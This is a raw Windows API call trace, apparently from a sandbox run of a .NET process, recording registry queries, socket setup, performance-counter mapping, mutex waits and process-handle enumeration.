	[0891.319] GetCurrentProcess () returned 0xffffffffffffffff
	[0891.319] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73d8e8 | out: TokenHandle=0x1c73d8e8*=0x350) returned 1
	[0891.320] GetCurrentProcess () returned 0xffffffffffffffff
	[0891.320] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73d8e8 | out: TokenHandle=0x1c73d8e8*=0x378) returned 1
	[0897.191] GetCurrentProcess () returned 0xffffffffffffffff
	[0897.191] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73d568 | out: TokenHandle=0x1c73d568*=0x378) returned 1
	[0897.834] GetCurrentProcess () returned 0xffffffffffffffff
	[0897.834] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73d568 | out: TokenHandle=0x1c73d568*=0x3ac) returned 1
	[0897.852] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x358
	[0897.852] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x350
	[0898.619] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.620] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73d538 | out: TokenHandle=0x1c73d538*=0x3a8) returned 1
	[0898.627] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.627] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73d538 | out: TokenHandle=0x1c73d538*=0x370) returned 1
	[0898.639] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.639] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73d478 | out: TokenHandle=0x1c73d478*=0x37c) returned 1
	[0898.647] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.647] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73d478 | out: TokenHandle=0x1c73d478*=0x380) returned 1
	[0898.650] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.650] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73dab8 | out: TokenHandle=0x1c73dab8*=0x384) returned 1
	[0899.319] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c73bb78 | out: phkResult=0x1c73bb78*=0x388) returned 0x0
	[0899.319] RegQueryValueExW (in: hKey=0x388, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c73bafc, lpData=0x0, lpcbData=0x1c73baf8*=0x0 | out: lpType=0x1c73bafc*=0x1, lpData=0x0, lpcbData=0x1c73baf8*=0xe) returned 0x0
	[0899.319] CoTaskMemAlloc (cb=0x12) returned 0x1b81b7b0
	[0899.320] RegQueryValueExW (in: hKey=0x388, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c73bacc, lpData=0x1b81b7b0, lpcbData=0x1c73bac8*=0xe | out: lpType=0x1c73bacc*=0x1, lpData="Client", lpcbData=0x1c73bac8*=0xe) returned 0x0
	[0899.320] CoTaskMemFree (pv=0x1b81b7b0) 
	[0899.320] RegCloseKey (hKey=0x388) returned 0x0
	[0899.332] CoTaskMemAlloc (cb=0xcd0) returned 0x1b83ef90
	[0899.333] RasEnumConnectionsW (in: param_1=0x1b83ef90, param_2=0x1c73db0c, param_3=0x1c73db08 | out: param_1=0x1b83ef90, param_2=0x1c73db0c, param_3=0x1c73db08) returned 0x0
	[0899.338] CoTaskMemFree (pv=0x1b83ef90) 
	[0899.345] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c73d918 | out: lpWSAData=0x1c73d918) returned 0
	[0899.354] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3e8
	[0900.077] setsockopt (s=0x3e8, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0900.077] closesocket (s=0x3e8) returned 0
	[0900.077] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3e8
	[0900.079] setsockopt (s=0x3e8, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0900.080] closesocket (s=0x3e8) returned 0
	[0900.085] GetCurrentProcess () returned 0xffffffffffffffff
	[0900.085] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73d198 | out: TokenHandle=0x1c73d198*=0x3e8) returned 1
	[0900.098] GetCurrentProcess () returned 0xffffffffffffffff
	[0900.098] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c73d198 | out: TokenHandle=0x1c73d198*=0x3ec) returned 1
	[0900.813] GetCurrentProcessId () returned 0x1668
	[0900.827] CoTaskMemAlloc (cb=0x204) returned 0x2c7be0
	[0900.827] GetComputerNameW (in: lpBuffer=0x2c7be0, nSize=0x2fc1988 | out: lpBuffer="XDUWTFONO", nSize=0x2fc1988) returned 1
	[0900.827] CoTaskMemFree (pv=0x2c7be0) 
	[0900.828] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c73d678 | out: phkResult=0x1c73d678*=0x3f0) returned 0x0
	[0900.828] RegQueryValueExW (in: hKey=0x3f0, lpValueName="Library", lpReserved=0x0, lpType=0x1c73d5fc, lpData=0x0, lpcbData=0x1c73d5f8*=0x0 | out: lpType=0x1c73d5fc*=0x1, lpData=0x0, lpcbData=0x1c73d5f8*=0x1c) returned 0x0
	[0900.828] CoTaskMemAlloc (cb=0x20) returned 0x1b83c260
	[0900.828] RegQueryValueExW (in: hKey=0x3f0, lpValueName="Library", lpReserved=0x0, lpType=0x1c73d5cc, lpData=0x1b83c260, lpcbData=0x1c73d5c8*=0x1c | out: lpType=0x1c73d5cc*=0x1, lpData="netfxperf.dll", lpcbData=0x1c73d5c8*=0x1c) returned 0x0
	[0900.829] CoTaskMemFree (pv=0x1b83c260) 
	[0900.829] RegQueryValueExW (in: hKey=0x3f0, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c73d5fc, lpData=0x0, lpcbData=0x1c73d5f8*=0x0 | out: lpType=0x1c73d5fc*=0x4, lpData=0x0, lpcbData=0x1c73d5f8*=0x4) returned 0x0
	[0900.830] RegQueryValueExW (in: hKey=0x3f0, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c73d600, lpData=0x1c73d5fc, lpcbData=0x1c73d5f8*=0x4 | out: lpType=0x1c73d600*=0x4, lpData=0x1c73d5fc*=0x1, lpcbData=0x1c73d5f8*=0x4) returned 0x0
	[0900.830] RegQueryValueExW (in: hKey=0x3f0, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c73d5fc, lpData=0x0, lpcbData=0x1c73d5f8*=0x0 | out: lpType=0x1c73d5fc*=0x4, lpData=0x0, lpcbData=0x1c73d5f8*=0x4) returned 0x0
	[0900.830] RegQueryValueExW (in: hKey=0x3f0, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c73d600, lpData=0x1c73d5fc, lpcbData=0x1c73d5f8*=0x4 | out: lpType=0x1c73d600*=0x4, lpData=0x1c73d5fc*=0x137a, lpcbData=0x1c73d5f8*=0x4) returned 0x0
	[0900.830] RegCloseKey (hKey=0x3f0) returned 0x0
	[0900.833] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c73d638 | out: phkResult=0x1c73d638*=0x3f0) returned 0x0
	[0900.833] RegQueryValueExW (in: hKey=0x3f0, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c73d5bc, lpData=0x0, lpcbData=0x1c73d5b8*=0x0 | out: lpType=0x1c73d5bc*=0x4, lpData=0x0, lpcbData=0x1c73d5b8*=0x4) returned 0x0
	[0900.833] RegQueryValueExW (in: hKey=0x3f0, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c73d5c0, lpData=0x1c73d5bc, lpcbData=0x1c73d5b8*=0x4 | out: lpType=0x1c73d5c0*=0x4, lpData=0x1c73d5bc*=0x3, lpcbData=0x1c73d5b8*=0x4) returned 0x0
	[0900.833] RegQueryValueExW (in: hKey=0x3f0, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c73d5bc, lpData=0x0, lpcbData=0x1c73d5b8*=0x0 | out: lpType=0x1c73d5bc*=0x4, lpData=0x0, lpcbData=0x1c73d5b8*=0x4) returned 0x0
	[0900.833] RegQueryValueExW (in: hKey=0x3f0, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c73d5c0, lpData=0x1c73d5bc, lpcbData=0x1c73d5b8*=0x4 | out: lpType=0x1c73d5c0*=0x4, lpData=0x1c73d5bc*=0x20000, lpcbData=0x1c73d5b8*=0x4) returned 0x0
	[0900.833] RegQueryValueExW (in: hKey=0x3f0, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c73d5bc, lpData=0x0, lpcbData=0x1c73d5b8*=0x0 | out: lpType=0x1c73d5bc*=0x3, lpData=0x0, lpcbData=0x1c73d5b8*=0xaa) returned 0x0
	[0900.833] RegQueryValueExW (in: hKey=0x3f0, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c73d5bc, lpData=0x2fc4c78, lpcbData=0x1c73d5b8*=0xaa | out: lpType=0x1c73d5bc*=0x3, lpData=0x2fc4c78*, lpcbData=0x1c73d5b8*=0xaa) returned 0x0
	[0900.838] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0900.842] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c73d570, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0900.843] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x3f8
	[0900.846] MapViewOfFile (hFileMappingObject=0x3f8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2970000
	[0900.847] VirtualQuery (in: lpAddress=0x2970000, lpBuffer=0x1c73d568, dwLength=0x30 | out: lpBuffer=0x1c73d568*(BaseAddress=0x2970000, AllocationBase=0x2970000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0900.847] LocalFree (hMem=0x2d7e70) returned 0x0
	[0900.848] RegCloseKey (hKey=0x3f0) returned 0x0
	[0900.850] GetVersionExW (in: lpVersionInformation=0x1c73c540*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c73c540*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0900.851] GetVersionExW (in: lpVersionInformation=0x1c73c510*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c73c510*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0900.853] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fc5948, cbSid=0x1c73d550 | out: pSid=0x2fc5948*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c73d550) returned 1
	[0900.855] CreateMutexW (lpMutexAttributes=0x2fc5b50, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f0
	[0901.265] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x1f4) returned 0x0
	[0901.633] GetCurrentProcessId () returned 0x1668
	[0901.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1668) returned 0x3fc
	[0901.634] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x1c73d460, lpExitTime=0x1c73d458, lpKernelTime=0x1c73d450, lpUserTime=0x1c73d448 | out: lpCreationTime=0x1c73d460, lpExitTime=0x1c73d458, lpKernelTime=0x1c73d450, lpUserTime=0x1c73d448) returned 1
	[0901.635] CloseHandle (hObject=0x3fc) returned 1
	[0901.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14f0) returned 0x3fc
	[0901.635] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x1c73d4f0, lpExitTime=0x1c73d4e8, lpKernelTime=0x1c73d4e0, lpUserTime=0x1c73d4d8 | out: lpCreationTime=0x1c73d4f0, lpExitTime=0x1c73d4e8, lpKernelTime=0x1c73d4e0, lpUserTime=0x1c73d4d8) returned 1
	[0901.635] CloseHandle (hObject=0x3fc) returned 1
	[0901.635] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x14f0) returned 0x3fc
	[0901.639] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.639] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.640] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c73d448, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c73d448*=0x404) returned 1
	[0901.641] CloseHandle (hObject=0x404) returned 1
	[0901.641] CloseHandle (hObject=0x3fc) returned 1
	[0901.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf2c) returned 0x3fc
	[0901.642] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x1c73d4f0, lpExitTime=0x1c73d4e8, lpKernelTime=0x1c73d4e0, lpUserTime=0x1c73d4d8 | out: lpCreationTime=0x1c73d4f0, lpExitTime=0x1c73d4e8, lpKernelTime=0x1c73d4e0, lpUserTime=0x1c73d4d8) returned 1
	[0901.642] CloseHandle (hObject=0x3fc) returned 1
	[0901.642] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf2c) returned 0x3fc
	[0901.642] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.642] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.642] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c73d448, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c73d448*=0x404) returned 1
	[0901.642] CloseHandle (hObject=0x404) returned 1
	[0901.642] CloseHandle (hObject=0x3fc) returned 1
	[0901.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9b8) returned 0x3fc
	[0901.643] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x1c73d4f0, lpExitTime=0x1c73d4e8, lpKernelTime=0x1c73d4e0, lpUserTime=0x1c73d4d8 | out: lpCreationTime=0x1c73d4f0, lpExitTime=0x1c73d4e8, lpKernelTime=0x1c73d4e0, lpUserTime=0x1c73d4d8) returned 1
	[0901.643] CloseHandle (hObject=0x3fc) returned 1
	[0901.643] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x9b8) returned 0x3fc
	[0901.643] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.643] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.643] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c73d448, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c73d448*=0x404) returned 1
	[0901.643] CloseHandle (hObject=0x404) returned 1
	[0901.643] CloseHandle (hObject=0x3fc) returned 1
	[0901.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcb0) returned 0x3fc
	[0901.644] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x1c73d4f0, lpExitTime=0x1c73d4e8, lpKernelTime=0x1c73d4e0, lpUserTime=0x1c73d4d8 | out: lpCreationTime=0x1c73d4f0, lpExitTime=0x1c73d4e8, lpKernelTime=0x1c73d4e0, lpUserTime=0x1c73d4d8) returned 1
	[0901.644] CloseHandle (hObject=0x3fc) returned 1
	[0901.644] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xcb0) returned 0x3fc
	[0901.644] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.644] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.644] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c73d448, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c73d448*=0x404) returned 1
	[0901.644] CloseHandle (hObject=0x404) returned 1
	[0901.644] CloseHandle (hObject=0x3fc) returned 1
	[0901.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf10) returned 0x3fc
	[0901.645] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x1c73d4f0, lpExitTime=0x1c73d4e8, lpKernelTime=0x1c73d4e0, lpUserTime=0x1c73d4d8 | out: lpCreationTime=0x1c73d4f0, lpExitTime=0x1c73d4e8, lpKernelTime=0x1c73d4e0, lpUserTime=0x1c73d4d8) returned 1
	[0901.645] CloseHandle (hObject=0x3fc) returned 1
	[0901.645] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf10) returned 0x3fc
	[0901.645] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.645] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.645] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c73d448, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c73d448*=0x404) returned 1
	[0901.645] CloseHandle (hObject=0x404) returned 1
	[0901.645] CloseHandle (hObject=0x3fc) returned 1
	[0901.646] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf18) returned 0x3fc
	[0901.646] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x1c73d4f0, lpExitTime=0x1c73d4e8, lpKernelTime=0x1c73d4e0, lpUserTime=0x1c73d4d8 | out: lpCreationTime=0x1c73d4f0, lpExitTime=0x1c73d4e8, lpKernelTime=0x1c73d4e0, lpUserTime=0x1c73d4d8) returned 1
	[0901.646] CloseHandle (hObject=0x3fc) returned 1
	[0901.646] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf18) returned 0x3fc
	[0901.646] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.646] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.646] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c73d448, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c73d448*=0x404) returned 1
	[0901.646] CloseHandle (hObject=0x404) returned 1
	[0901.647] CloseHandle (hObject=0x3fc) returned 1
	[0901.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf64) returned 0x3fc
	[0901.647] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x1c73d4f0, lpExitTime=0x1c73d4e8, lpKernelTime=0x1c73d4e0, lpUserTime=0x1c73d4d8 | out: lpCreationTime=0x1c73d4f0, lpExitTime=0x1c73d4e8, lpKernelTime=0x1c73d4e0, lpUserTime=0x1c73d4d8) returned 1
	[0901.647] CloseHandle (hObject=0x3fc) returned 1
	[0901.647] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf64) returned 0x3fc
	[0901.647] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.647] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.647] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c73d448, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c73d448*=0x404) returned 1
	[0901.647] CloseHandle (hObject=0x404) returned 1
	[0901.648] CloseHandle (hObject=0x3fc) returned 1
	[0901.648] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf38) returned 0x3fc
	[0901.648] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x1c73d4f0, lpExitTime=0x1c73d4e8, lpKernelTime=0x1c73d4e0, lpUserTime=0x1c73d4d8 | out: lpCreationTime=0x1c73d4f0, lpExitTime=0x1c73d4e8, lpKernelTime=0x1c73d4e0, lpUserTime=0x1c73d4d8) returned 1
	[0901.648] CloseHandle (hObject=0x3fc) returned 1
	[0901.648] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf38) returned 0x3fc
	[0901.648] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.648] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.648] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c73d448, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c73d448*=0x404) returned 1
	[0901.648] CloseHandle (hObject=0x404) returned 1
	[0901.649] CloseHandle (hObject=0x3fc) returned 1
	[0901.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf6c) returned 0x3fc
	[0901.649] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x1c73d4f0, lpExitTime=0x1c73d4e8, lpKernelTime=0x1c73d4e0, lpUserTime=0x1c73d4d8 | out: lpCreationTime=0x1c73d4f0, lpExitTime=0x1c73d4e8, lpKernelTime=0x1c73d4e0, lpUserTime=0x1c73d4d8) returned 1
	[0901.649] CloseHandle (hObject=0x3fc) returned 1
	[0901.649] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf6c) returned 0x3fc
	[0901.649] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.649] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.649] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c73d448, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c73d448*=0x404) returned 1
	[0901.649] CloseHandle (hObject=0x404) returned 1
	[0901.650] CloseHandle (hObject=0x3fc) returned 1
	[0901.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf54) returned 0x3fc
	[0901.650] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x1c73d4f0, lpExitTime=0x1c73d4e8, lpKernelTime=0x1c73d4e0, lpUserTime=0x1c73d4d8 | out: lpCreationTime=0x1c73d4f0, lpExitTime=0x1c73d4e8, lpKernelTime=0x1c73d4e0, lpUserTime=0x1c73d4d8) returned 1
	[0901.650] CloseHandle (hObject=0x3fc) returned 1
	[0901.650] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf54) returned 0x3fc
	[0901.650] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.650] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.650] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c73d448, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c73d448*=0x404) returned 1
	[0901.651] CloseHandle (hObject=0x404) returned 1
	[0901.651] CloseHandle (hObject=0x3fc) returned 1
	[0901.652] ReleaseMutex (hMutex=0x3f0) returned 1
	[0901.653] CloseHandle (hObject=0x3f0) returned 1
	[0901.653] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fc6f00, cbSid=0x1c73d550 | out: pSid=0x2fc6f00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c73d550) returned 1
	[0901.653] CreateMutexW (lpMutexAttributes=0x2fc70b8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0901.654] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3f0
	[0901.654] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x1f4) returned 0x0
	[0901.677] ReleaseMutex (hMutex=0x3f0) returned 1
	[0901.677] CloseHandle (hObject=0x3f0) returned 1
	[0901.677] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fc7d48, cbSid=0x1c73d550 | out: pSid=0x2fc7d48*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c73d550) returned 1
	[0901.677] CreateMutexW (lpMutexAttributes=0x2fc7f00, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0901.677] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3f0
	[0901.677] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x1f4) returned 0x0
	[0901.680] ReleaseMutex (hMutex=0x3f0) returned 1
	[0901.680] CloseHandle (hObject=0x3f0) returned 1
	[0901.680] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fc8ba0, cbSid=0x1c73d550 | out: pSid=0x2fc8ba0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c73d550) returned 1
	[0901.680] CreateMutexW (lpMutexAttributes=0x2fc8d58, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0901.681] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3f0
	[0901.681] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x1f4) returned 0x0
	[0901.683] ReleaseMutex (hMutex=0x3f0) returned 1
	[0901.683] CloseHandle (hObject=0x3f0) returned 1
	[0901.684] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fc99f0, cbSid=0x1c73d550 | out: pSid=0x2fc99f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c73d550) returned 1
	[0901.684] CreateMutexW (lpMutexAttributes=0x2fc9ba8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0901.684] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3f0
	[0901.684] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x1f4) returned 0x0
	[0901.687] ReleaseMutex (hMutex=0x3f0) returned 1
	[0901.687] CloseHandle (hObject=0x3f0) returned 1
	[0901.689] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fca840, cbSid=0x1c73d500 | out: pSid=0x2fca840*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c73d500) returned 1
	[0901.690] CreateMutexW (lpMutexAttributes=0x2fca9f8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0901.690] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3f0
	[0901.690] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x1f4) returned 0x0
	[0901.695] ReleaseMutex (hMutex=0x3f0) returned 1
	[0901.695] CloseHandle (hObject=0x3f0) returned 1
